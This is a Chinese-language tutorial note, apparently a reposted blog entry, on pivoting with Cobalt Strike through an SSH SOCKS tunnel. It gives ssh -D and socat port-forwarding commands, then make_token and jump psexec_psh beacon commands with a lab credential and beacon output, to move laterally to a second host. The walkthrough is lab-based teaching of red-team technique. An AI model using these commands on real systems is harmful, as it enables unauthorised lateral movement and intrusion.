CS学习笔记 | 22、通过SSH开通通道
时间:2022-07-25
本文章向大家介绍CS学习笔记 | 22、通过SSH开通通道,主要内容包括其使用实例、应用技巧、基本知识点总结和需要注意事项,具有一定的参考价值,需要的朋友可以参考一下。
0x00 前言
这一节将来介绍如何通过 SSH 通道进行攻击。
0x01 通过 SSH 建立通道
1. 连接到上图中蓝色区域里的 PIVOT 主机并开启端口转发
ssh -D 1080 user@<blue pivot>
该命令中的 -D 参数会使 SSH 会建立一个 socket,并去监听本地的 1080 端口,一旦有数据传向那个端口,就自动把它转移到 SSH 连接上面,随后发往远程主机。
2. 在红色区域的 PIVOT 主机上开启通过 SSH Socks 的 445 端口转发
socat TCP4-LISTEN:445,fork SOCKS4:127.0.0.1:<target>:445
socat 可以理解成 netcat 的加强版。socat 建立 socks 连接默认端口就是 1080 ,由于我们上面设置的就是 1080,因此这里不需变动。如果设置了其他端口,那么这里还需要在命令最后加上
,socksport=<port>
指定端口才行。
3. 在攻击者控制的主机上运行 beacon,使其上线
注意需要使用 administrator 权限运行 beacon
4. 在上线的主机上运行以下命令
make_token [DOMAINuser] [password]jump psexec_psh <red pivot> [listener]
整体的流程就是下面这张图一样。
0x02 演示
我在本地搭建了这样的一个环境。
1. 首先使 Win1 主机上线,接着在 Linux1 主机上通过 SSH 连接到 Linux2 主机。
ssh -D 1080 user@192.168.175.146
> ssh -D 1080 user@192.168.175.146user@192.168.175.146's password: Last login: Fri Jul 31 20:00:54 2020 from 192.168.175.1user@ubuntu:~$
2. 在 Linux1 主机上开启 445 端口转发
socat TCP4-LISTEN:445,fork SOCKS4:127.0.0.1:192.168.232.132:445
3. 在 Win1 主机上运行以下命令使 Win2 上线
make_token teamssixadministrator Test123!jump psexec_psh 192.168.175.200 smb
beacon> make_token teamssixadministrator Test123![*] Tasked beacon to create a token for teamssixadministrator[+] host called home, sent: 61 bytes[+] Impersonated WINTESTAdministrator
beacon> jump psexec_psh 192.168.175.200 smb[*] Tasked beacon to run windows/beacon_bind_pipe (\.pipemsagent_532c) on 192.168.175.200 via Service Control Manager (PSH)[+] host called home, sent: 5886 bytes[+] received output:Started service 4aea3b9 on 192.168.175.200[+] host called home, sent: 204473 bytes[+] established link to child beacon: 192.168.232.132
4. 随后便可以看到通过 SSH 上线的主机
原文链接:https://www.teamssix.com/year/200419-150657.html 参考链接: https://payloads.online/tools/socat https://www.bilibili.com/video/BV16b411i7n5 https://blog.csdn.net/pipisorry/article/details/52269785
- Kaggle大神带你上榜单Top2%:点击预测大赛纪实(下)
- WordPress主题后台选项开发框架 Options Framework 介绍
- vc++ 在程序中运行另一个程序的方法
- 为Options Framework主题后台框架添加后台侧边栏
- ClistCtrl用法及总结(由怎样隐藏ListCtrl列表头的排序小三角形这个bug学习到的知识)
- 弹出式模态窗体选择文本控件
- zookeeper 分布式锁服务
- QT Creator 快速入门教程 读书笔记(三)
- WordPress中添加自定义评论表情包的方法(附三套表情包下载)
- 使用新类型Nullable处理数据库表中null字段
- QT Creator 快速入门教程 读书笔记(二)
- 设计模式学习笔记-命令模式
- .com域名和.cn域名的介绍
- Windows安装和使用zookeeper
- JavaScript 教程
- JavaScript 编辑工具
- JavaScript 与HTML
- JavaScript 与Java
- JavaScript 数据结构
- JavaScript 基本数据类型
- JavaScript 特殊数据类型
- JavaScript 运算符
- JavaScript typeof 运算符
- JavaScript 表达式
- JavaScript 类型转换
- JavaScript 基本语法
- JavaScript 注释
- Javascript 基本处理流程
- Javascript 选择结构
- Javascript if 语句
- Javascript if 语句的嵌套
- Javascript switch 语句
- Javascript 循环结构
- Javascript 循环结构实例
- Javascript 跳转语句
- Javascript 控制语句总结
- Javascript 函数介绍
- Javascript 函数的定义
- Javascript 函数调用
- Javascript 几种特殊的函数
- JavaScript 内置函数简介
- Javascript eval() 函数
- Javascript isFinite() 函数
- Javascript isNaN() 函数
- parseInt() 与 parseFloat()
- escape() 与 unescape()
- Javascript 字符串介绍
- Javascript length属性
- javascript 字符串函数
- Javascript 日期对象简介
- Javascript 日期对象用途
- Date 对象属性和方法
- Javascript 数组是什么
- Javascript 创建数组
- Javascript 数组赋值与取值
- Javascript 数组属性和方法
- Python人工智能经典算法之机器学习第二篇
- Python人工智能经典算法之机器学习第三篇
- Python人工智能经典算法之K-近邻算法
- Python人工智能经典算法之线性回归
- Python人工智能经典算法之逻辑回归
- Python人工智能经典算法之决策树
- Python人工智能经典算法之聚类算法
- 【NPM库】- 0x06 - WebSocket
- 代码详解——《无人驾驶车辆模型预测控制》3.3.3代码详解
- 【前端】:模块化 - 打包技术
- 代码详解——《无人驾驶车辆模型预测控制》3.3.3参考路径更改
- MySQL redo与undo日志解析
- 样本不平衡造成的影响和解决方案
- 代码详解——NMPC路径跟踪复杂参考路径设置
- 代码详解——NMPC之加入控制平顺性惩罚项